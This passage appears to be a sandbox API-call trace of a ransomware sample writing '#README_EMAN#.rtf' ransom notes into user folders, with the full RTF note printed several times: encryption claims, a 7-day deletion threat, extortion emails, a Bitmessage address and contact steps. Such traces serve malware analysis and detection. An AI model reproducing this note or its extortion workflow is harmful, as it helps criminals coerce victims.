b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9aÓ8", lpUsedDefaultChar=0x0) returned 8717 [0271.407] WriteFile (in: hFile=0x2ec, lpBuffer=0x1ef7008*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef7008*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0271.412] CloseHandle (hObject=0x2ec) returned 1 [0271.412] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\dc\\acrobat\\cache\\cache\\#readme_eman#.rtf")) returned 0x20 [0271.412] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Color\\Profiles\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\color\\profiles\\#readme_eman#.rtf")) returned 0x20 [0271.412] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\#readme_eman#.rtf")) returned 0x20 [0271.412] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\#readme_eman#.rtf")) returned 0x20 [0271.412] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\#readme_eman#.rtf")) returned 0x20 [0271.412] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\#readme_eman#.rtf")) returned 0xffffffff [0271.412] GetLastError () returned 0x2 [0271.412] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0271.417] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.417] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.417] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 